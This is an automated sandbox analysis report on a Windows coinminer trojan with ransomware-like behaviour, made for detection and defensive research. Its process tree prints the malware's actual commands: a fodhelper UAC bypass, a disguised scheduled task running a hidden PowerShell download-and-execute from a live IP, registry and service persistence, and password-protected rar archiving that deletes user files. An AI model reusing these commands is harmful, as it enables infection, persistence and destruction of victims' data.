Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jxatBamQnK

Overview

General Information

Sample Name:jxatBamQnK (renamed file extension from none to exe)
Analysis ID:683425
MD5:c44c67fbbd78af44e4e75787e636e1fe
SHA1:a72928ef28c93893cf510937e6c4c7336f21c50c
SHA256:55bc3c6946fe78077bea015b9e93414db807495f353a88b2aeb6d9315cb31322
Tags:CoinMinerexetrojan
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Sigma detected: Powershell Download and Execute IEX
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Powershell drops PE file
Drops script or batch files to the startup folder
Uses schtasks.exe or at.exe to add and modify task schedules
Creates an autostart registry key pointing to binary in C:\Windows
Suspicious powershell command line found
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • jxatBamQnK.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\jxatBamQnK.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C fodhelper.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fodhelper.exe (PID: 6436 cmdline: fodhelper.exe MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
        • reg.exe (PID: 6484 cmdline: "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6816 cmdline: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6828 cmdline: schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6844 cmdline: sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6912 cmdline: sc description msupdate "Just For Test" MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 7028 cmdline: sc config msupdate start= auto MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 7060 cmdline: net start msupdate MD5: 15534275EDAABC58159DD0F8607A71E5)
      • conhost.exe (PID: 3244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5716 cmdline: C:\Windows\system32\net1 start msupdate MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • reg.exe (PID: 7164 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • reg.exe (PID: 3852 cmdline: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • reg.exe (PID: 4040 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 6424 cmdline: wmic process get executablepath MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • findstr.exe (PID: 4584 cmdline: findstr encrypt.exe MD5: BCC8F29B929DABF5489C9BE6587FF66D)
      • conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • encrypt.exe (PID: 6660 cmdline: C:\Windows\Temp\encrypt.exe MD5: 9996CC802C43F6FFE4065A514585C209)
      • cmd.exe (PID: 1880 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6148 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
          • Conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2952 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6476 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
          • Conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • Conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4372 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 1252 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
        • Conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 772 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6964 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
          • Conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1268 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6540 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
        • Conhost.exe (PID: 6840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1424 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 3140 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
      • cmd.exe (PID: 6408 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6452 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
        • Conhost.exe (PID: 4392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6440 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6032 cmdline: C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=" MD5: FAC97E0E14C47740AB74C0C14C0F9CEC)
      • cmd.exe (PID: 6468 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Conhost.exe (PID: 3268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6744 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=.rar1" "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • WMIC.exe (PID: 4968 cmdline: wmic process get executablepath MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • powershell.exe (PID: 6932 cmdline: powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\"http://212.87.212.218/doanlowd.txt\") MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 2888 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • conhost.exe (PID: 4912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4440 cmdline: powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt') MD5: 95000560239032BC68B4C2FDFCDEF913)
      • daemon.exe (PID: 6220 cmdline: C:\Windows\Temp\daemon.exe MD5: C44C67FBBD78AF44E4E75787E636E1FE)
        • WMIC.exe (PID: 6864 cmdline: wmic process get executablepath MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
          • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • findstr.exe (PID: 7088 cmdline: findstr encrypt.exe MD5: BCC8F29B929DABF5489C9BE6587FF66D)
          • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6004 cmdline: wmic process get executablepath MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
          • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • findstr.exe (PID: 6044 cmdline: findstr scan.exe MD5: BCC8F29B929DABF5489C9BE6587FF66D)
          • conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • Conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • scan.exe (PID: 2828 cmdline: C:\Windows\Temp\scan.exe MD5: A0B1030B402875ED5AE9338B73E6B5B2)
  • daemon.exe (PID: 6052 cmdline: "C:\Windows\Temp\daemon.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE)
  • svchost.exe (PID: 7008 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • daemon.exe (PID: 7048 cmdline: "C:\Windows\Temp\daemon.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE)
  • daemon.exe (PID: 4404 cmdline: "C:\Windows\Temp\daemon.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE)
  • svchost.exe (PID: 6000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • Conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x118:$sb1: -w hidden
    • 0x113:$sc1: -nop
    • 0x122:$se2: -exec bypass
    • 0x122:$se4: -exec bypass
    C:\Users\user\Documents\20220813\PowerShell_transcript.179605.PThsxFDM.20220813090655.txtJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.batPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
      • 0x13:$sb1: -w hidden
      • 0xe:$sc1: -nop
      • 0x1d:$se2: -exec bypass
      • 0x1d:$se4: -exec bypass
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Users\user\Documents\20220813\PowerShell_transcript.179605.7QwF43q_.20220813090656.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0x118:$sb1: -w hidden
        • 0x113:$sc1: -nop
        • 0x122:$se2: -exec bypass
        • 0x122:$se4: -exec bypass
        Click to see the 4 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000003.386967956.000000C000120000.00000004.00001000.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0x70:$sb1: -w hidden
        • 0x160:$sb1: -w hidden
        • 0x6b:$sc1: -nop
        • 0x15b:$sc1: -nop
        • 0x7a:$se2: -exec bypass
        • 0x16a:$se2: -exec bypass
        • 0x7a:$se4: -exec bypass
        • 0x16a:$se4: -exec bypass
        00000000.00000003.387736595.000000C000056000.00000004.00001000.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0x883:$sb1: -w hidden
        • 0xa33:$sb1: -w hidden
        • 0x87e:$sc1: -nop
        • 0xa2e:$sc1: -nop
        • 0x88d:$se2: -exec bypass
        • 0xa3d:$se2: -exec bypass
        • 0x88d:$se4: -exec bypass
        • 0xa3d:$se4: -exec bypass
        00000023.00000003.440719623.000000C00009E000.00000004.00001000.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0x133:$sb1: -w hidden
        • 0x2e3:$sb1: -w hidden
        • 0x12e:$sc1: -nop
        • 0x2de:$sc1: -nop
        • 0x13d:$se2: -exec bypass
        • 0x2ed:$se2: -exec bypass
        • 0x13d:$se4: -exec bypass
        • 0x2ed:$se4: -exec bypass
        00000000.00000003.386987758.000000C000112000.00000004.00001000.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0x253:$sb1: -w hidden
        • 0x24e:$sc1: -nop
        • 0x25d:$se2: -exec bypass
        • 0x25d:$se4: -exec bypass
        00000023.00000003.439742062.000000C00018A000.00000004.00001000.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
        • 0x1c3:$sb1: -w hidden
        • 0x1be:$sc1: -nop
        • 0x1cd:$se2: -exec bypass
        • 0x1cd:$se4: -exec bypass
        Click to see the 15 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_6932.amsi.csvSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
        • 0xa11d:$s3: System.Net.WebClient).DownloadFile('http
        • 0xa244:$s3: System.Net.WebClient).DownloadFile('http
        amsi64_4440.amsi.csvSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
        • 0xa11d:$s3: System.Net.WebClient).DownloadFile('http
        • 0xa244:$s3: System.Net.WebClient).DownloadFile('http
        amsi64_4440.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          Data Obfuscation

          barindex
          Sigma detected: Drops script at startup location
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\jxatBamQnK.exe, ProcessId: 6352, TargetFilename: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat
          Sigma detected: Powershell Download and Execute IEX
